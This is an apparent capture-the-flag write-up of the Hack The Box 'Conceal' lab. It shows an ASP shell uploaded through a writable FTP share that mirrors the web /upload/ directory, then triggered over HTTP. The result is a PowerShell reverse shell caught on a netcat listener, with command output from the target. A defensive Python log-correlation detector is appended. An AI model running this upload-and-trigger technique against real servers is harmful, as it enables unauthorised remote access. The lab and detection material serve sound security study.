File Upload


I am able to upload to the FTP server. There is also a web directory named /upload/.

It is possible that the FTP server is serving the web directory, /upload/, or that the /upload/ directory is serving/mirroring the FTP server root.

Either way, I can confirm that by uploading a test file through the FTP server and checking the web directory.

┌──(kali㉿kali)-[~/archive/htb/labs/conceal]
└─$ echo 'hi there!' > test.txt
ftp> put test.txt 
local: test.txt remote: test.txt
229 Entering Extended Passive Mode (|||49680|)
125 Data connection already open; Transfer starting.
100% |*******************************************************************************************|    11      210.63 kib/s    --:-- ETA
226 Transfer complete.
11 bytes sent in 00:00 (0.33 KiB/s)

The test file, test.txt, was uploaded to the FTP server.

┌──(kali㉿kali)-[~/archive/htb/labs/conceal]
└─$ curl http://$IP/upload/test.txt
hi there!

The theory is confirmed. The FTP server is serving the web directory, /upload/.

Exploitation


ftp> put shell.asp 
local: shell.asp remote: shell.asp
229 Entering Extended Passive Mode (|||49701|)
125 Data connection already open; Transfer starting.
100% |*****************|   625       12.16 MiB/s    --:-- ETA
226 Transfer complete.
625 bytes sent in 00:00 (14.46 KiB/s)

I uploaded the payload to the FTP server.

┌──(kali㉿kali)-[~/archive/htb/labs/conceal]
└─$ curl http://$IP/upload/shell.asp  

Triggering the payload.

┌──(kali㉿kali)-[~/archive/htb/labs/conceal]
└─$ nnc 9999
listening on [any] 9999 ...
connect to [10.10.14.10] from (UNKNOWN) [10.10.10.116] 49746
 
PS C:\Windows\SysWOW64\inetsrv> whoami
conceal\destitute
PS C:\Windows\SysWOW64\inetsrv> hostname
Conceal
PS C:\Windows\SysWOW64\inetsrv> ipconfig
 
Windows IP Configuration
 
 
Ethernet adapter Ethernet0 2:
 
   Connection-specific DNS Suffix  . : htb
   IPv6 Address. . . . . . . . . . . : dead:beef::243
   IPv6 Address. . . . . . . . . . . : dead:beef::3d73:e77b:9e2f:732d
   Temporary IPv6 Address. . . . . . : dead:beef::8132:4c8a:f844:c799
   Link-local IPv6 Address . . . . . : fe80::3d73:e77b:9e2f:732d%12
   IPv4 Address. . . . . . . . . . . : 10.10.10.116
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:6c92%12
                                       10.10.10.2

Initial foothold established on the target system as destitute.
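
From the defender's side, the sequence above (a script file stored over FTP, then requested under /upload/ over HTTP) can be detected by correlating the two services' logs. The following is an added example, not part of the original writeup; the W3C-style field layout, the extension list, the function names and every log line are constructed assumptions.

```python
import posixpath

SCRIPT_EXTS = {".asp", ".aspx", ".asa", ".cer", ".php"}  # handler-mapped extensions (assumed list)
WEB_PREFIX = "/upload/"  # web path that mirrors the FTP root, as on this page

# Constructed sample logs in W3C extended format (field layout is an assumption).
FTP_LOG = """#Fields: date time c-ip cs-method cs-uri-stem sc-status
2024-01-01 10:00:01 192.0.2.10 STOR /test.txt 226
2024-01-01 10:05:12 192.0.2.10 STOR /shell.asp 226
2024-01-01 10:06:00 192.0.2.11 STOR /report.pdf 226
2024-01-01 10:07:00 192.0.2.12 STOR /denied.asp 550
"""
HTTP_LOG = """#Fields: date time c-ip cs-method cs-uri-stem sc-status
2024-01-01 10:00:30 192.0.2.10 GET /upload/test.txt 200
2024-01-01 10:05:40 192.0.2.10 GET /upload/shell.asp 200
2024-01-01 10:09:00 192.0.2.11 GET /upload/report.pdf 200
"""

def parse_w3c(text):
    """Yield one dict per record, keyed by the names in the #Fields directive."""
    fields = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#"):
            yield dict(zip(fields, line.split()))

def uploaded_then_requested(ftp_text, http_text):
    """Return alerts for script files stored over FTP and later fetched over HTTP."""
    stored = {}
    for r in parse_w3c(ftp_text):
        ext = posixpath.splitext(r["cs-uri-stem"])[1].lower()
        # Only completed transfers (226) of script-capable files are of interest.
        if r["cs-method"] == "STOR" and r["sc-status"] == "226" and ext in SCRIPT_EXTS:
            web_path = WEB_PREFIX + r["cs-uri-stem"].lstrip("/")
            stored[web_path.lower()] = r
    alerts = []
    for r in parse_w3c(http_text):
        up = stored.get(r["cs-uri-stem"].lower())
        # ISO-style date and time strings compare correctly as text.
        if up and (r["date"], r["time"]) >= (up["date"], up["time"]):
            alerts.append({"path": r["cs-uri-stem"], "uploader": up["c-ip"],
                           "requester": r["c-ip"], "http_status": r["sc-status"]})
    return alerts

if __name__ == "__main__":
    for alert in uploaded_then_requested(FTP_LOG, HTTP_LOG):
        print("ALERT", alert)
```

The alert only fires because the upload directory both accepts FTP writes and executes scripts; serving that directory as static content only, or keeping the FTP root outside the web root, removes the condition it detects.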